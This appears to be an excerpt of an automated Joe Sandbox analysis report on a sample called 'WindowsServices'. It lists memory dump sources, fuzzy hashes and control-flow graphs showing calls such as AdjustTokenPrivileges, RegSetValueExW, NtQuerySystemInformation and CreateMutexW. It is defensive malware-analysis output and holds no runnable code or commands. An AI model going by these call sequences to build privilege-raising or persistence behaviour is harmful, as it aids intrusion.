                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3f259fa1a59fb689f3506c4d56f8529858ac6eb0fa24d5d245e871dd72d65e31
                                                                                          • Instruction ID: 77cb2c2d39e7558da038ad9d33859efebe60e88aa97ca19099121bd69c655318
                                                                                          • Opcode Fuzzy Hash: 3f259fa1a59fb689f3506c4d56f8529858ac6eb0fa24d5d245e871dd72d65e31
                                                                                          • Instruction Fuzzy Hash: AFF0F0347002108FC314773DA8565AE3362DBE5356B14087EE8419B396CF79DC4BC391
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1803218210.0000000000F10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_f10000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6587b4044f2af9d1e4334320a15b7e55eb49b21b7f2fb063e102ce8643e25a8c
                                                                                          • Instruction ID: d2228cc89022176bb6f9efe5b24503d912fbd1ba30ba8c192f51c96c07927437
                                                                                          • Opcode Fuzzy Hash: 6587b4044f2af9d1e4334320a15b7e55eb49b21b7f2fb063e102ce8643e25a8c
                                                                                          • Instruction Fuzzy Hash: 06E06DB6A006049B9750CF0AEC41452F7D8EB88630708C07FDC0D8B701E635B508CAA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802074352.0000000000CB2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB2000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cb2000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7961455cf75c016809b687a0a84c7d05ba427efe9d69cd5a1a2069a0b1d5758
                                                                                          • Instruction ID: 061b08c19ae437026ce65fc65f7e8ebebcacd3533b392c062bd71363dd49a13c
                                                                                          • Opcode Fuzzy Hash: d7961455cf75c016809b687a0a84c7d05ba427efe9d69cd5a1a2069a0b1d5758
                                                                                          • Instruction Fuzzy Hash: 95D02E392406C04FD3168E0CC2A8BC53BD4BF40708F0A00F9A8008BB63C728DAC8EA00
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802074352.0000000000CB2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB2000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cb2000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac7900c5df6793865d0913e09bd10e64da706d5dc6a73317c801a345f16e82d8
                                                                                          • Instruction ID: 30a1f106a7d01a75664f25c1f386e5119d8be0e4d58c92c03940eb1e4c18ec2d
                                                                                          • Opcode Fuzzy Hash: ac7900c5df6793865d0913e09bd10e64da706d5dc6a73317c801a345f16e82d8
                                                                                          • Instruction Fuzzy Hash: 08D05E343406814BC715DE0CD2D4F9937D8AB44B15F0644E8AC208B772C7A8DAC4CA00
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:13.3%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:35
                                                                                          Total number of Limit Nodes:2
                                                                                          execution_graph 713 c2a602 714 c2a62e FindCloseChangeNotification 713->714 715 c2a66d 713->715 716 c2a63c 714->716 715->714 745 c2a462 746 c2a486 RegSetValueExW 745->746 748 c2a507 746->748 753 c2a361 755 c2a392 RegQueryValueExW 753->755 756 c2a41b 755->756 717 c2aa46 718 c2aaa6 717->718 719 c2aa7b NtQuerySystemInformation 717->719 718->719 720 c2aa90 719->720 721 c2abc6 724 c2abfe CreateMutexW 721->724 723 c2ac41 724->723 757 c2a5e4 758 c2a602 FindCloseChangeNotification 757->758 760 c2a63c 758->760 729 c2a8ca 732 c2a8f9 AdjustTokenPrivileges 729->732 731 c2a91b 732->731 765 c2ab92 766 c2abc6 CreateMutexW 765->766 768 c2ac41 766->768 769 c2a893 772 c2a89d AdjustTokenPrivileges 769->772 771 c2a91b 772->771 773 c2aa15 774 c2aa46 NtQuerySystemInformation 773->774 776 c2aa90 774->776 761 c2a67b 762 c2a6ae LookupPrivilegeValueW 761->762 764 c2a6fe 762->764

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00E90069 1 Function_00E90268 2 Function_00E913E8 3 Function_00EC026D 4 Function_00C2A140 5 Function_00C2A540 6 Function_00C2AAC0 7 Function_00E9006D 8 Function_00C2AA46 9 Function_00C2ABC6 10 Function_00E9096F 11 Function_00EC066A 12 Function_00C22044 13 Function_00C2A8CA 14 Function_00E90BE0 15 Function_00C2A2D2 16 Function_00E90278 61 Function_00E90020 16->61 17 Function_00C220D0 18 Function_00EC067F 19 Function_00C2A5D1 20 Function_00C2A751 21 Function_00EC0074 22 Function_00C22458 23 Function_00E90FF5 24 Function_00C2A25E 25 Function_00C2A45C 26 Function_00E90AF6 27 Function_00C2A462 28 Function_00C2A960 29 Function_00C2A361 30 Function_00EC0649 30->11 31 Function_00C22364 32 Function_00C22264 33 Function_00C2A5E4 34 Function_00C2A56E 35 Function_00C2AAEE 36 Function_00E90045 37 Function_00EC0740 38 Function_00EC05C0 39 Function_00E907C4 40 Function_00C2A7EC 41 Function_00E906DB 42 Function_00C221F0 43 Function_00EC05DF 44 Function_00C2A776 45 Function_00C223F4 46 Function_00E90CD1 47 Function_00E90BD0 48 Function_00C2A67B 49 Function_00E908D3 50 Function_00C2A078 51 Function_00C2A2FE 52 Function_00E911D5 53 Function_00EC05D0 54 Function_00C2247C 55 Function_00C2A602 56 Function_00E90429 57 Function_00C2A186 58 Function_00C2A486 59 Function_00C22005 60 Function_00C2A005 62 Function_00E90727 63 Function_00C2A20C 64 Function_00C2268D 65 Function_00C2A392 66 Function_00C2A812 67 Function_00C2AB92 68 Function_00C2A893 69 Function_00C22310 70 Function_00C22194 71 Function_00E90B3E 72 Function_00E90CBE 73 Function_00C2AA15 74 Function_00C2A99A 75 Function_00C22098 76 Function_00E90835 77 Function_00EC000C 78 Function_00E90080 79 Function_00EC0606 80 Function_00C2A6AE 81 Function_00C2A02E 82 Function_00EC0000 83 Function_00C22430 84 Function_00C222B4 85 Function_00E90C10 86 Function_00E90392 87 Function_00C2A0BE 88 Function_00E90015 89 Function_00EC0710 90 Function_00C2A73F 91 Function_00C223BC 92 Function_00C2213C 93 Function_00C2A23C

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 213 c2a893-c2a8f7 217 c2a8f9 213->217 218 c2a8fc-c2a90b 213->218 217->218 219 c2a94e-c2a953 218->219 220 c2a90d-c2a92d AdjustTokenPrivileges 218->220 219->220 223 c2a955-c2a95a 220->223 224 c2a92f-c2a94b 220->224 223->224
                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00C2A913
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: 7da2c0a9b4dfeb1b1ec16baac15c3ea656b7e0c427b2c453182f40de6a1b8052
                                                                                          • Instruction ID: cce8c26220d91f8208e5ec4673d0700251d03a723ea0724a3c89a68db338209a
                                                                                          • Opcode Fuzzy Hash: 7da2c0a9b4dfeb1b1ec16baac15c3ea656b7e0c427b2c453182f40de6a1b8052
                                                                                          • Instruction Fuzzy Hash: 5521A1765097809FEB228F25DC44B52BFF4EF16310F0984DAE9858B5A3D275E908CB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 293 c2aa15-c2aa79 295 c2aaa6-c2aaab 293->295 296 c2aa7b-c2aa8e NtQuerySystemInformation 293->296 295->296 297 c2aa90-c2aaa3 296->297 298 c2aaad-c2aab2 296->298 298->297
                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00C2AA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: c9bfd49a5fcc40b8dff932d4ab01d770697e9dff070f6c862840dfa4d8384df9
                                                                                          • Instruction ID: bb7b2085c473d50b1c1e486acc8ac24f19e96ab8c9f5ddb7a13226f82f502123
                                                                                          • Opcode Fuzzy Hash: c9bfd49a5fcc40b8dff932d4ab01d770697e9dff070f6c862840dfa4d8384df9
                                                                                          • Instruction Fuzzy Hash: 6F1190714097C09FDB228F24DC45B52FFF4EF56314F0984DAE9844B663D275A908DB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00C2A913
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPrivilegesToken
                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: e093ede0026c17babd0a1155cb6ade8e78cf591f76172f0a88b145656711e710
                                                                                          • Instruction ID: 187c149a6c640469b12028b97034d868b92316d5a466d8350094ed9659b2391a
                                                                                          • Opcode Fuzzy Hash: e093ede0026c17babd0a1155cb6ade8e78cf591f76172f0a88b145656711e710
                                                                                          • Instruction Fuzzy Hash: D611C2725007009FEB20CF16E884B62FBE4EF18320F08C4AAED458BA56D375E558DF62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00C2AA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: fa37736a873c97aedd5a168deedca6dccd90e23c6bc4e2006fcc2569c2e56a76
                                                                                          • Instruction ID: 417c5b41bd664b20e199b46261969878f5bf147a83d624bf783f0256eb79d556
                                                                                          • Opcode Fuzzy Hash: fa37736a873c97aedd5a168deedca6dccd90e23c6bc4e2006fcc2569c2e56a76
                                                                                          • Instruction Fuzzy Hash: FE018F36400640DFDB208F15E984B62FBE0EF19320F08C09AED450BA52D375E418DF62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 e90278-e902a6 1 e902a8 call e90020 0->1 2 e902ae-e902bc 0->2 1->2 3 e903d8-e903ec 2->3 4 e902c2-e90305 2->4 7 e903f2-e9046b 3->7 8 e90475-e904c8 3->8 22 e903b9-e903d2 4->22 7->8 20 e904ca 8->20 21 e904cf-e904e9 8->21 20->21 25 e904eb-e90515 21->25 26 e90520-e90677 21->26 22->3 24 e9030a-e90316 22->24 27 e90bbd 24->27 28 e9031c-e9034d 24->28 25->26 57 e9067d-e906bb 26->57 58 e906ff-e90bb8 26->58 30 e90bc2-e90bde 27->30 37 e9034f-e90385 28->37 38 e90390-e903b3 28->38 37->38 38->22 38->30 57->58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l
                                                                                          • API String ID: 0-1392491997
                                                                                          • Opcode ID: 11e554bac97f782c342041841b620177e46cd7c14e57adf671e7dfd488da13c4
                                                                                          • Instruction ID: 93a806bf2a8dc6168ced774a86b8d5ca88aa7ffa519071c0e871256f37dd5638
                                                                                          • Opcode Fuzzy Hash: 11e554bac97f782c342041841b620177e46cd7c14e57adf671e7dfd488da13c4
                                                                                          • Instruction Fuzzy Hash: CFA18D70A01218CFDB14EFB5D854BEDBBB2AF85304F5084A9D409AB3A1DB359E85CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 65 e90392-e903ad 69 e903af-e903b3 65->69 70 e903b9-e903d2 69->70 71 e90bc2-e90bde 69->71 72 e903d8-e903ec 70->72 73 e9030a-e90316 70->73 79 e903f2-e9046b 72->79 80 e90475-e904aa 72->80 75 e90bbd 73->75 76 e9031c-e9034d 73->76 75->71 84 e9034f-e90385 76->84 85 e90390 76->85 79->80 90 e904b5-e904c8 80->90 84->85 85->69 93 e904ca 90->93 94 e904cf-e904e9 90->94 93->94 97 e904eb-e90515 94->97 98 e90520-e90677 94->98 97->98 117 e9067d-e906bb 98->117 118 e906ff-e90bb8 98->118 117->118
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l
                                                                                          • API String ID: 0-1392491997
                                                                                          • Opcode ID: 735a3b7511139497743b54232627a8c2783ce456b6841445448de93d5b75574a
                                                                                          • Instruction ID: d324c2d3f03cd50f9b2905f29d5e6e6a1babe6379b0ea6d3216a337c4be51635
                                                                                          • Opcode Fuzzy Hash: 735a3b7511139497743b54232627a8c2783ce456b6841445448de93d5b75574a
                                                                                          • Instruction Fuzzy Hash: 36617E70A01219CFDB24EFB5D950BECB7B2AF44308F5084A9D009AB3A1DB359E85DF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 124 e90429-e904aa 134 e904b5-e904c8 124->134 135 e904ca 134->135 136 e904cf-e904e9 134->136 135->136 138 e904eb-e90515 136->138 139 e90520-e90677 136->139 138->139 158 e9067d-e906bb 139->158 159 e906ff-e90bb8 139->159 158->159
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1997560679.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_e90000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l
                                                                                          • API String ID: 0-1392491997
                                                                                          • Opcode ID: 163673cacf3390833a0a72c8854b58f556b056a2053af233f5d306be4de4a092
                                                                                          • Instruction ID: 8d57b491d80817e2ffb9a62a556baab21f93bf3368227545462b7f4cb3d3c925
                                                                                          • Opcode Fuzzy Hash: 163673cacf3390833a0a72c8854b58f556b056a2053af233f5d306be4de4a092
                                                                                          • Instruction Fuzzy Hash: CC514970A01219CFDB24EFB5C850BECB7B1AF84304F5084A9D009AB7A1DB359E89DF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 165 c2ab92-c2ac15 169 c2ac17 165->169 170 c2ac1a-c2ac23 165->170 169->170 171 c2ac25 170->171 172 c2ac28-c2ac31 170->172 171->172 173 c2ac82-c2ac87 172->173 174 c2ac33-c2ac57 CreateMutexW 172->174 173->174 177 c2ac89-c2ac8e 174->177 178 c2ac59-c2ac7f 174->178 177->178
                                                                                          APIs
                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 00C2AC39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMutex
                                                                                          • String ID:
                                                                                          • API String ID: 1964310414-0
                                                                                          • Opcode ID: dd28d949abca705bd295d82beadaf349c3900cabcdc9d5f95abaaa653e3f4440
                                                                                          • Instruction ID: f97158897a47e5ee0a1d9350393abdbedb4112e1e4d0d0471d33647b77464ccf
                                                                                          • Opcode Fuzzy Hash: dd28d949abca705bd295d82beadaf349c3900cabcdc9d5f95abaaa653e3f4440
                                                                                          • Instruction Fuzzy Hash: 5D31AF71509380AFE712CB65DC84B96BFF8EF06310F08849AE984CB692D375E909C762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 181 c2a361-c2a3cf 184 c2a3d1 181->184 185 c2a3d4-c2a3dd 181->185 184->185 186 c2a3e2-c2a3e8 185->186 187 c2a3df 185->187 188 c2a3ea 186->188 189 c2a3ed-c2a404 186->189 187->186 188->189 191 c2a406-c2a419 RegQueryValueExW 189->191 192 c2a43b-c2a440 189->192 193 c2a442-c2a447 191->193 194 c2a41b-c2a438 191->194 192->191 193->194
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 9aeb1de80991acf821edbecfc2d9113ac9000218d09308ce9b904540ab719c9e
                                                                                          • Instruction ID: dca4b21398ee3fc12a1555a2c32bfb6d16206c797ad54212085bd123b5017c39
                                                                                          • Opcode Fuzzy Hash: 9aeb1de80991acf821edbecfc2d9113ac9000218d09308ce9b904540ab719c9e
                                                                                          • Instruction Fuzzy Hash: AB316F75505780AFE722CF11DC84F92FBF8EF06710F08849AE9458B6A2D364E949CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 198 c2a462-c2a4c3 201 c2a4c5 198->201 202 c2a4c8-c2a4d4 198->202 201->202 203 c2a4d6 202->203 204 c2a4d9-c2a4f0 202->204 203->204 206 c2a4f2-c2a505 RegSetValueExW 204->206 207 c2a527-c2a52c 204->207 208 c2a507-c2a524 206->208 209 c2a52e-c2a533 206->209 207->206 209->208
                                                                                          APIs
                                                                                          • RegSetValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A4F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 449981446c7db377339eda64ccf2b5a66c4db9b1745590cff59011062dd00b9a
                                                                                          • Instruction ID: 7ec96c056ccb2412c6ce73c99d0a1456fbc6b50f9ed16c5e14fd72c847c8edc6
                                                                                          • Opcode Fuzzy Hash: 449981446c7db377339eda64ccf2b5a66c4db9b1745590cff59011062dd00b9a
                                                                                          • Instruction Fuzzy Hash: 41217476504780AFD7228F11DC44FA7FFB8EF46710F08849AE945DB652D264E948C772
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 239 c2abc6-c2ac15 242 c2ac17 239->242 243 c2ac1a-c2ac23 239->243 242->243 244 c2ac25 243->244 245 c2ac28-c2ac31 243->245 244->245 246 c2ac82-c2ac87 245->246 247 c2ac33-c2ac3b CreateMutexW 245->247 246->247 248 c2ac41-c2ac57 247->248 250 c2ac89-c2ac8e 248->250 251 c2ac59-c2ac7f 248->251 250->251
                                                                                          APIs
                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 00C2AC39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMutex
                                                                                          • String ID:
                                                                                          • API String ID: 1964310414-0
                                                                                          • Opcode ID: feda5ca761851f314dd81957129825d91700e3ae68c82b307774c1bed3763a1c
                                                                                          • Instruction ID: 576004c8ac932d704f7a109c84b0d5d3ac28f09c7266d6ce7b00d02e63f6edd7
                                                                                          • Opcode Fuzzy Hash: feda5ca761851f314dd81957129825d91700e3ae68c82b307774c1bed3763a1c
                                                                                          • Instruction Fuzzy Hash: 102192716002409FEB10DF65DD45BA6FBE8EF15324F14C4A9E9449B741D375E908CA72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 226 c2a67b-c2a6d5 228 c2a6d7 226->228 229 c2a6da-c2a6e0 226->229 228->229 230 c2a6e2 229->230 231 c2a6e5-c2a6ee 229->231 230->231 232 c2a6f0-c2a6f8 LookupPrivilegeValueW 231->232 233 c2a731-c2a736 231->233 234 c2a6fe-c2a710 232->234 233->232 236 c2a712-c2a72e 234->236 237 c2a738-c2a73d 234->237 237->236
                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00C2A6F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 9636079630e8d6f0ced0247cc6cdb8dc87459c3cfa5ce73b6ec925135ca1e829
                                                                                          • Instruction ID: 271b7e78f5aae86c53f95b24eda7aa03ec7196ed6b423bfa2c0573aabd80de1c
                                                                                          • Opcode Fuzzy Hash: 9636079630e8d6f0ced0247cc6cdb8dc87459c3cfa5ce73b6ec925135ca1e829
                                                                                          • Instruction Fuzzy Hash: 252180755093805FDB128B65DC85B92BFF8EF16310F0984DAE884CB6A3D234D908C762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 254 c2a392-c2a3cf 256 c2a3d1 254->256 257 c2a3d4-c2a3dd 254->257 256->257 258 c2a3e2-c2a3e8 257->258 259 c2a3df 257->259 260 c2a3ea 258->260 261 c2a3ed-c2a404 258->261 259->258 260->261 263 c2a406-c2a419 RegQueryValueExW 261->263 264 c2a43b-c2a440 261->264 265 c2a442-c2a447 263->265 266 c2a41b-c2a438 263->266 264->263 265->266
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 3eca5a8184a6661f8224c5e5899f2d80c2f940cc5cb4348ef45e790101338148
                                                                                          • Instruction ID: 153c267ac5ee6b80739745b7327ec247786b41c537d154efdb7b82fca0da4fe6
                                                                                          • Opcode Fuzzy Hash: 3eca5a8184a6661f8224c5e5899f2d80c2f940cc5cb4348ef45e790101338148
                                                                                          • Instruction Fuzzy Hash: 7F21C076600600AFEB20CF16DC84FA2F7ECEF04720F18C45AE9458BA51D774E948CA72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 270 c2a960-c2a9c4 272 c2a9c6-c2a9ce FindCloseChangeNotification 270->272 273 c2aa07-c2aa0c 270->273 274 c2a9d4-c2a9e6 272->274 273->272 276 c2a9e8-c2aa04 274->276 277 c2aa0e-c2aa13 274->277 277->276
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00C2A9CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: c52271349bbe7894e35c0446965d666a2d330a536d9a9fc04ccbc1622143ad6d
                                                                                          • Instruction ID: c71f0fa0ab7e9ae50b824cd16851b38e72bbc91281ddaea407554da9b2c13eff
                                                                                          • Opcode Fuzzy Hash: c52271349bbe7894e35c0446965d666a2d330a536d9a9fc04ccbc1622143ad6d
                                                                                          • Instruction Fuzzy Hash: 8D21C3715093C09FDB128F25DC54B92BFB4AF57324F0984DAEC858F663D274A908DB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 279 c2a486-c2a4c3 281 c2a4c5 279->281 282 c2a4c8-c2a4d4 279->282 281->282 283 c2a4d6 282->283 284 c2a4d9-c2a4f0 282->284 283->284 286 c2a4f2-c2a505 RegSetValueExW 284->286 287 c2a527-c2a52c 284->287 288 c2a507-c2a524 286->288 289 c2a52e-c2a533 286->289 287->286 289->288
                                                                                          APIs
                                                                                          • RegSetValueExW.KERNELBASE(?,00000E24,E3D593FF,00000000,00000000,00000000,00000000), ref: 00C2A4F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.1994559065.0000000000C2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2A000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_c2a000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 76912bd584cea8318935d454216f397f4cf0e94fbf92f9ddba148a8f8d12bfea
                                                                                          • Instruction ID: 0ba81aa83d6798f432c391cd08e6589a45eadfee12d79e9274ef5f8355148e2e
                                                                                          • Opcode Fuzzy Hash: 76912bd584cea8318935d454216f397f4cf0e94fbf92f9ddba148a8f8d12bfea
                                                                                          • Instruction Fuzzy Hash: 7711B176500600AFEB218F11DC44FA7FBECEF14720F08845AED459AA51D774E948CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
